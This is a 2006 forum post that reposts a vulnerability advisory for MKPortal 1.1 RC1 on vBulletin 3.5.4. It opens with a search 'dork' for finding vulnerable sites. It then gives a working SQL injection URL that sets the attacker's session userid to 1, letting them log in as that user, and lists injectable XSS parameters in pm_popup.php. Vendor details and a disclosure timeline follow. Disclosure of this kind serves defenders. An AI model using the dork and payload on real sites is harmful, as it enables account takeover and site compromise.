Gonzalez Posted December 5, 2006 Report Posted December 5, 2006 Dorks: "MKPortal 1.1 RC1"Method found by nukedx,Contacts > ICQ: 10072 MSN/Mail: [mail]nukedx@nukedx.com[/mail] web: [url]http://www.nukedx.comThis[/url] exploit works on MKPortal <= 1.1 RC1 with vBulletin <= 3.5.4[url]http://[victim]/[/url][mkportaldir]/index.php?ind=',userid='1With this example you can change your session's userid to 1.Original advisory: [url]http://www.nukedx.com/?viewdoc=26[/url] # nukedx.com [2006-04-21]--Security Report--Advisory: vBulletin <= 3.5.4 with MKPortal 1.1 Remote SQL Injection Vulnerability.---Author: Mustafa Can Bjorn "nukedx a.k.a nuker" IPEKCI---Date: 21/04/06 22:36 PM---Contacts:{ICQ: 10072MSN/Email: nukedx at nukedx.comWeb: [url]http://www.nukedx.com[/url]}---Vendor: MKPortal ([url]http://www.mkportal.it/[/url])Version: 1.1 RC1 and prior versions must be affected. (Runs on vBulletin!)About: Via this methods remote attacker can inject arbitrary SQL queries to ind parameter in index.php of MKPortal.Vulnerable code can be found in the file mkportal/include/VB/vb_board_functions.php at line 35-37, as you can see it easy toby pass this SQL update function.Also there is cross-site scripting vulnerability in pm_popup.php the parameters u1,m1,m2,m3,m4 did not sanitized properly.Level: Critical---How&Example: SQL Injection :GET -> [url]http://[victim]/[/url][mkportaldir]/index.php?ind=[SQL]EXAMPLE -> [url]http://[victim]/[/url][mkportaldir]/index.php?ind=',userid='1So with this example remote attacker updates his session's userid to 1 and after refreshing the page he can logs as userid 1.XSS:GET -> [url]http://[victim]/[/url][mkportaldir]/includes/pm_popup.php?u1=[XSS]&m1=[XSS]&m2=[XSS]&m3=[XSS]&m4=[XSS]---Timeline:* 21/04/2006: Vulnerability found.* 21/04/2006: Contacted with vendor and waiting reply.--- Quote
